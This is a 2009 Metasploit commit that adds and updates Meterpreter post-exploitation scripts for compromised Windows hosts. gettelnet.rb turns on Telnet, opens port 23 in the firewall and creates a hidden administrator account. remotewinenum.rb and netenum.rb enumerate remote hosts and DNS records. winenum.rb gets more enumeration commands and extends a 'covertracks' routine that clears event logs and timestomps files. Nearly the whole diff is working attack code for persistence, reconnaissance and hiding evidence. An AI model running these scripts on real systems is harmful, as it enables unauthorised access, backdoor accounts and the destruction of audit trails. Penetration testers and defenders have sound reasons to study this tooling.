New scripts and updated scripts from Carlos Perez

git-svn-id: file:///home/svn/framework3/trunk@6202 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2009-01-30 06:18:02 +00:00 · 2009-01-30 06:18:02 +00:00 · e6ef0ab495
commit e6ef0ab495
parent f927320eda
4 changed files with 519 additions and 17 deletions
--- a/scripts/meterpreter/gettelnet.rb
+++ b/scripts/meterpreter/gettelnet.rb
@ -0,0 +1,201 @@
+#!/usr/bin/env ruby
+#
+#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
+#Windows 2008 and Windows XP targets using native windows commands.
+#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
+#Verion: 0.1.1
+#Note: If the Telnet Server is not installed in Vista or win2k8
+#	it will be installed.
+################## Variable Declarations ##################
+
+session = client
+@@exec_opts = Rex::Parser::Arguments.new(
+		"-h" => [ false,  "Help menu."                        ],
+		"-e" => [ false,  "Enable Telnet Server only."  ],
+		"-p" => [ true,  "The Password of the user to add."  ],
+       		"-u" => [ true,  "The Username of the user to add."  ]
+		)
+def checkifinst(session)
+	r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
+	while(d = r.channel.read)
+		if d =~ (/TlntSvr/)
+			return true
+		end
+			
+	end
+	r.channel.close
+	r.close
+end
+
+#-------------------------------------------------------------------------------
+def winver(session)
+	stringtest = ""
+	verout = []
+	r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
+		while(d = r.channel.read)
+			stringtest << d
+		end
+	r.channel.close
+	r.close
+
+	verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
+	version = nil
+	if verout[0] == "6"
+		if verout[1] == "0"
+			version = "Windows Vista/Windows 2008"
+		elsif verout[1] == "1"
+			version = "Windpows 7"
+		end
+	elsif verout [0] == "5"
+		if verout[1] == "0"
+			version = "Windows 2000"
+		elsif verout[1] == "1"
+			version = "Windows XP"
+		elsif verout[1] == "2"
+			version = "Windows 2003"
+		end
+	end
+	version
+end
+
+#---------------------------------------------------------------------------------------------------------
+def insttlntsrv(session)
+	trgtos = winver(session)
+	if trgtos =~ /(Windows Vista)/ 
+		if checkifinst(session)
+			print_status("Telnet Service Installed on Target")
+		else
+			print_status("Installing Telnet Server Service ......")
+			session.response_timeout=90
+			r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
+			while(d = r.channel.read)
+				tmpout << d
+			end
+			r.channel.close
+			r.close
+			end
+		end
+	end
+
+#---------------------------------------------------------------------------------------------------------
+def enabletlntsrv(session)
+	tmpout = [ ]
+	cmdout = []
+	key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
+	root_key2, base_key2 = session.sys.registry.splitkey(key2)
+	value2 = "Start"
+	begin
+	open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
+	v2 = open_key.query_value(value2)
+	print_status "Setting Telnet Server Services service startup mode"
+	if v2.data != 2
+		print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
+		cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
+		cmmds. each do |cmd|
+			r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
+			while(d = r.channel.read)
+				tmpout << d
+			end
+			cmdout << tmpout
+			r.channel.close
+			r.close
+			end
+	else
+		print_status "\tTelnet Server Services service is already set to auto"
+	end
+	#Enabling Exception on the Firewall
+	print_status "\tOpening port in local firewall if necessary"
+	r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
+	while(d = r.channel.read)
+		tmpout << d
+	end
+	cmdout << tmpout
+	r.channel.close
+	r.close
+	rescue::Exception => e
+			print_status("The following Error was encountered: #{e.class} #{e}")
+	end
+end
+#---------------------------------------------------------------------------------------------------------
+def addrdpusr(session, username, password)
+	tmpout = [ ]
+	cmdout = []
+	print_status "Setting user account for logon"
+	print_status "\tAdding User: #{username} with Password: #{password}"
+	begin
+	r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
+	while(d = r.channel.read)
+		tmpout << d
+	end
+	cmdout << tmpout
+	r.channel.close
+	r.close
+	print_status "\tAdding User: #{username} to local group TelnetClients"
+	r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
+	while(d = r.channel.read)
+		tmpout << d
+	end
+	cmdout << tmpout
+	r.channel.close
+	r.close
+	print_status "\tAdding User: #{username} to local group Administrators"
+	r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
+	while(d = r.channel.read)
+		tmpout << d
+	end
+	cmdout << tmpout
+	r.channel.close
+	r.close
+	print_status "You can now login with the created user"
+	rescue::Exception => e
+			print_status("The following Error was encountered: #{e.class} #{e}")
+	end
+end
+#---------------------------------------------------------------------------------------------------------
+def message
+	print_status "Windows Telnet Server Enabler Meterpreter Script"
+end
+def usage
+	print(
+	"Windows Telnet Server Enabler Meterpreter Script\n" +
+	"Usage: getgui -u <username> -p <password> \n" +
+	@@exec_opts.usage			
+	)
+end
+################## MAIN ##################
+# Parsing of Options
+usr = nil
+pass = nil
+lport = nil
+enbl = nil
+@@exec_opts.parse(args) { |opt, idx, val|
+	case opt
+		when "-u"
+			usr = val
+		when "-p"
+			pass = val
+		when "-h"
+			usage
+			break
+		when "-n"
+			lport = val.to_i
+		when "-e"
+			enbl = 1
+		end
+
+}
+if enbl == 1
+	message
+	insttlntsrv(session)
+	enabletlntsrv(session)
+
+elsif usr!= nil && pass != nil
+	message
+	insttlntsrv(session)
+	enabletlntsrv(session)
+	addrdpusr(session, usr, pass)
+
+else
+	usage
+end
+
--- a/scripts/meterpreter/netenum.rb
+++ b/scripts/meterpreter/netenum.rb
@ -4,7 +4,7 @@ require 'ftools'
 #Meterpreter script for ping sweeps on Windows 2003, Windows Vista
 #Windows 2008 and Windows XP targets using native windows commands.
 #Provided by Carlos Perez at carlos_perez[at]darkoperator.com
-#Verion: 0.1.1
+#Verion: 0.1.2
 #Note:
 ################## Variable Declarations ##################
@@exec_opts = Rex::Parser::Arguments.new(
@ -15,7 +15,8 @@ require 'ftools'
  "-fl" => [ false,  "To Perform DNS Forward Lookup on host list and domain"],
  "-hl" => [ true,  "File with Host List for DNS Forward Lookup"],
  "-d"  => [ true,  "Domain Name for DNS Forward Lookup"],
-  "-st" => [ false,  "To Perform DNS lookup of MX, NS and SOA records for a domain"]
+  "-st" => [ false,  "To Perform DNS lookup of MX and NS records for a domain"],
+  "-sr" => [ false,  "To Perform Service Record DNS lookup for a domain"]

 )
 session = client
@ -38,12 +39,14 @@ dest = logs + "/" + host + filenameinfo
 def stdlookup(session,domain,dest)
 	dest = dest + "-general-record-lookup.txt"
 	print_status("Getting MX and NS Records for Domain #{domain}")
-	filewrt(dest,"MX and NS Records for Domain #{domain}")
+	filewrt(dest,"SOA, NS and MX Records for Domain #{domain}")
+	types = ["SOA","NS","MX"]
 	mxout = []
 	results = []
 	garbage = []
+	types.each do |t|
 	begin
-		r = session.sys.process.execute("nslookup -query=mx #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
+		r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
 		while(d = r.channel.read)
 			mxout << d
 		end
@ -51,17 +54,19 @@ def stdlookup(session,domain,dest)
 		r.close
 		results = mxout.to_s.split(/\n/)
 		results.each do |rec|
-			if rec =~ /(Name:)/ or rec =~ /(Address:)/ or rec =~ /(Server:)/
-				garbage << rec
-			else
-				print_status("\t#{rec}")
-				filewrt(dest,"#{rec}")
-			end
+				if  rec.match(/\s*internet\saddress\s\=\s/)
+					garbage << rec.split(/\s*internet\saddress\s\=/)
+					print_status("#{garbage[0].to_s.sub(" ","   ")} #{t} ")
+					filewrt(dest,garbage[0].to_s.sub(" ","   ")+" #{t} ")
+					garbage.clear
+				end
+				garbage.clear
 		end

 	rescue ::Exception => e
    		print_status("The following Error was encountered: #{e.class} #{e}")
 	end
+	end
 end
 #-------------------------------------------------------------------------------
 # Function for writing results of other functions to a file
@ -215,6 +220,39 @@ def pingsweep(session,iprange,dest)
 	end
 end
 #-------------------------------------------------------------------------------
+#Function for enumerating srv records
+def srvreclkp(session,domain,dest)
+	dest = dest + "-srvenum.txt"
+	srout = []
+	garbage = []
+	srvrcd = [
+	    "_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.",
+	    "_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
+	    "_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."]
+	print_status("Performing SRV Record Enumeration for #{domain}")
+	filewrt(dest,"SRV Record Enumeration for #{domain}")
+	srvrcd.each do |srv|
+		r = session.sys.process.execute("nslookup -query=srv #{srv}#{domain}", nil, {'Hidden' => true, 'Channelized' => true})
+		while(d = r.channel.read)
+			srout << d
+		end
+		r.channel.close
+		r.close
+		results = srout.to_s.split(/\n/)
+		results.each do |rec|
+				if  rec.match(/\s*internet\saddress\s\=\s/)
+					garbage << rec.split(/\s*internet\saddress\s\=/)
+					print_status("\tfor #{srv}#{domain}   #{garbage[0].to_s.sub(" ","   ")}")
+					filewrt(dest,"for #{srv}#{domain}   #{garbage[0].to_s.sub(" ","   ")}")
+					garbage.clear
+				end
+		garbage.clear
+		srout.clear
+		end
+	end
+    
+end
+#-------------------------------------------------------------------------------
 #Function to print message during run
 def message(dest)
 	print_status "Network Enumerator Meterpreter Script "
@ -231,10 +269,12 @@ frdlkp = nil
 dom = nil
 hostlist = nil
 helpcall = nil
+srvrc = nil
 # Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
 	case opt
-
+  when "-sr"
+    srvrc = 1
  when "-rl"
    rvrslkp = 1
  when "-fl"
@ -249,6 +289,7 @@ helpcall = nil
    hostlist = val
  when "-r"
    range = val
+
  when "-h"
    print(
      "Network Enumerator Meterpreter Script\n" +
@ -270,7 +311,11 @@ elsif dom != nil && hostlist!= nil && frdlkp == 1
 	message(logs)
 	frwdlp(session,hostlist,dom,dest)
 elsif dom != nil && stdlkp == 1
+	message(logs)
 	stdlookup(session,dom,dest)
+elsif dom != nil && srvrc == 1
+	message(logs)
+	srvreclkp(session,dom,dest)
 elsif helpcall == nil
 	print(
    	"Network Enumerator Meterpreter Script\n" +
--- a/scripts/meterpreter/remotewinenum.rb
+++ b/scripts/meterpreter/remotewinenum.rb
@ -0,0 +1,210 @@
+#!/usr/bin/env ruby
+#
+#Meterpreter script for basic enumeration of Windows 2003, Windows Vista
+# and Windows XP remote targets using native windows command wmic.
+#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
+#Verion: 0.1.1
+#Note: 
+################## Variable Declarations ##################
+session = client
+# Variables for Options
+helpcall = 0
+rusr = nil
+rpass = nil
+trg = ""
+# Script Options
+@@exec_opts = Rex::Parser::Arguments.new(
+  "-h"  => [ false,  "Help menu."],
+  "-t"  => [ true,  "The target address"],
+  "-u"  => [ true,  "User on the target system (If not provided it will use credential of process)"],
+  "-p"  => [ true,  "Password of user on target system"]
+)
+
+# Create Filename info to be appended to downloaded files
+filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+
+# Create a directory for the logs
+logs = ::File.join(Msf::Config.config_directory, 'logs', 'remotewinenum')
+
+# Create the log directory
+::FileUtils.mkdir_p(logs)
+
+# WMIC Commands that will be executed on the Target
+wmic = [
+	'environment list',
+	'share list',
+	'nicconfig list',
+	'computersystem list',
+	'useraccount list',
+	'group list',
+	'sysaccount list',
+	'volume list brief',
+	'service list brief',
+	'process list brief',
+	'startup list full',
+	'rdtoggle list',
+	'qfe list'
+]
+################## Function Declarations ##################
+
+# Function for running a list of WMIC commands stored in a array, returs string
+def wmicexec(session,wmic,user,pass,trgt)
+	print_status("Running WMIC Commands ....")
+	tmpout = ''
+	command = nil
+	runfail = 0
+ 	runningas = session.sys.config.getuid
+	begin
+	tmp = session.fs.file.expand_path("%TEMP%")
+	# Temporary file on windows host to store results
+	wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
+	
+	      wmic.each do |wmi|
+		        if user == nil
+		          print_status("The commands will be ran under the credentials of #{runningas}")
+		          command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
+		        else
+		          command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
+		        end
+		        print_status "\trunning command wimic #{wmi}"
+		        r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
+		        sleep(1)
+		        r = session.sys.process.execute("cmd.exe /c echo      Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
+		        sleep(1)
+		        r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
+		        sleep(1)
+		        #print_status "\twmic #{command}"
+		        r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
+		         sleep(2)
+		        r.close
+		      end
+		      # Read the output file of the wmic commands
+		      wmioutfile = session.fs.file.new(wmicfl, "rb")
+		      until wmioutfile.eof?
+		      	tmpout << wmioutfile.read
+		      end
+		      # Close output file in host
+		      wmioutfile.close
+	rescue ::Exception => e
+    		print_status("Error running WMIC commands: #{e.class} #{e}")
+	end
+	# We delete the file with the wmic command output.
+	c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
+	c.close
+	tmpout
+end
+#-------------------------------------------------------------------------------
+# Function for writing results of other functions to a file
+def filewrt(file2wrt, data2wrt)
+	output = ::File.open(file2wrt, "a")
+	data2wrt.each do |d|
+		output.puts(d)
+	end
+	output.close
+end
+#------------------------------------------------------------------------------
+# Function to generate report header
+def headerbuid(session,target,dest)
+	# Header for File that will hold all the output of the commands
+	info = session.sys.config.sysinfo
+	header =  "Date:       #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
+	header << "Running as: #{client.sys.config.getuid}\n"
+	header << "From:       #{info['Computer']}\n"
+	header << "OS:         #{info['OS']}\n"
+	header << "Target:     #{target}\n"
+	header << "\n\n\n"
+	
+	print_status("Saving report to #{dest}")
+  header
+
+end
+#------------------------------------------------------------------------------
+def winver(session)
+	stringtest = ""
+	verout = []
+	r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
+		while(d = r.channel.read)
+			stringtest << d
+		end
+	r.channel.close
+	r.close
+
+	verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
+	version = nil
+	if verout[0] == "6"
+		if verout[1] == "0"
+			version = "Windows Vista/Windows 2008"
+		elsif verout[1] == "1"
+			version = "Windpows 7"
+		end
+	elsif verout [0] == "5"
+		if verout[1] == "0"
+			version = "Windows 2000"
+		elsif verout[1] == "1"
+			version = "Windows XP"
+		elsif verout[1] == "2"
+			version = "Windows 2003"
+		end
+	end
+	version
+end
+
+#------------------------------------------------------------------------------
+# Function Help Message
+def helpmsg
+	print(
+    "Remote Windows Enumeration Meterpreter Script\n" +
+    "This script will enumerate windows hosts in the target enviroment\n" +
+    "given a username and password or using the credential under witch\n" +
+    "Meterpeter is running using WMI wmic windows native tool.\n" +
+    "Usage:\n" +
+      @@exec_opts.usage
+  )
+end
+################## MAIN ##################
+
+localos = winver(session)
+
+# Check that the command is not being ran on a Win2k host
+# since wmic is not present in Windows 2000
+if localos =~ /(Windows 2000)/
+	print_status("This script is not supported to be ran from Windows 2000 servers!!!")
+else
+	# Parsing of Options
+	@@exec_opts.parse(args) { |opt, idx, val|
+		case opt
+
+	  when "-t"
+	    trg = val
+	  when "-u"
+	    rusr = val
+	  when "-p"
+	    rpass = val
+	  when "-h"
+	    helpmsg
+	    helpcall = 1
+	  end
+
+	}
+#logfile name
+dest = logs + "/" + trg + filenameinfo
+# Executing main logic of the script
+if helpcall == 0 and trg != ""
+
+# Making sure that is running as System a Username and Password for target machine must be provided
+
+	if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
+
+		print_status("Stopped: Running as System and no user provided for connecting to target!!")
+
+	else trg != nil && helpcall != 1
+	
+		filewrt(dest,headerbuid(session,trg,dest))
+		filewrt(dest,wmicexec(session,wmic,rusr,rpass,trg))
+	
+	end
+elsif helpcall == 0 and trg == ""
+
+	helpmsg
+end
+end
--- a/scripts/meterpreter/winenum.rb
+++ b/scripts/meterpreter/winenum.rb
@ -3,7 +3,7 @@
 #Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
 # and Windows XP targets using native windows commands.
 #Provided by Carlos Perez at carlos_perez[at]darkoperator.com
-#Verion: 0.3.2
+#Verion: 0.3.4
 #Note: Compleatly re-writen to make it modular and better error handling.
 #      Working on adding more Virtual Machine Checks and looking at improving
 #      the code but retain the independance of each module so it is easier for
@ -33,13 +33,18 @@ commands = [
 	'ipconfig /displaydns',
 	'route print',
 	'net view',
-	'netstat -na',
+	'netstat -nao',
+	'netstat -vb',
 	'netstat -ns',
 	'net accounts',
+	'net accounts /domain',
+	'net session',
 	'net share',
 	'net group',
 	'net user',
 	'net localgroup',
+	'net localgroup administrators',
+	'net group administrators',
 	'net view /domain',
 	'netsh firewall show config',
 	'tasklist /svc'
@ -62,11 +67,12 @@ cmdstomp = [
 wmic = [
 	'computersystem list',
 	'useraccount list',
-	'group',
+	'group list',
 	'service list brief',
 	'volume list brief',
 	'process list brief',
 	'startup list full',
+	'rdtoggle list',
 	'qfe',
 ]
 #Specific Commands for Windows vista for Wireless Enumeration
@ -84,6 +90,12 @@ nonwin2kcmd = [
 	'wbem\\wmic.exe',
 	'netsh.exe',
 ]
+# Executables not pressent in Windows 2000
+nowin2kexe = [
+	'netsh.exe',
+	'tasklist.exe',
+	'wbem\\wmic.exe',
+]
 ################## Function Declarations ##################

 # Function to check if Target Machine a VM
@ -357,7 +369,7 @@ end
 def covertracks(session,cmdstomp)
 	clrevtlgs(session)
 	info = session.sys.config.sysinfo
-	trgtos = info['OS']
+	trgtos = winver(session)
 	if trgtos =~ /(Windows 2000)/
 		chmace(session,cmdstomp - nonwin2kcmd)
 	else
@ -488,6 +500,36 @@ def killApp(session,procpid)
 	session.sys.process.kill(procpid)
 	print_status("Old process #{procpid} killed.")
 end
+#-------------------------------------------------------------------------------
+def winver(session)
+	stringtest = ""
+	verout = []
+	r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
+		while(d = r.channel.read)
+			stringtest << d
+		end
+	r.channel.close
+	r.close
+
+	verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
+	version = nil
+	if verout[0] == "6"
+		if verout[1] == "0"
+			version = "Windows Vista/Windows 2008"
+		elsif verout[1] == "1"
+			version = "Windpows 7"
+		end
+	elsif verout [0] == "5"
+		if verout[1] == "0"
+			version = "Windows 2000"
+		elsif verout[1] == "1"
+			version = "Windows XP"
+		elsif verout[1] == "2"
+			version = "Windows 2003"
+		end
+	end
+	version
+end

 #---------------------------------------------------------------------------------------------------------
 # Function to execute process migration
@ -537,7 +579,7 @@ if helpopt != 1
 	header << "Host:       #{info['Computer']}\n"
 	header << "OS:         #{info['OS']}\n"
 	header << "\n\n\n"
-	trgtos = info['OS']
+	trgtos = winver(session)
 	print_status("Saving report to #{dest}")
 	filewrt(dest,header)
 	filewrt(dest,chkvm(session))
@ -566,7 +608,11 @@ if helpopt != 1
 	end
 	if (cm != nil)
 		filewrt(dest,"EventLogs where Cleared")
-		covertracks(session,cmdstomp)
+		if trgtos =~ /(Windows 2000)/
+			covertracks(session,cmdstomp - nowin2kexe)
+		else
+			covertracks(session,cmdstomp)
+		end
 	end
 	print_status("Done!")
 end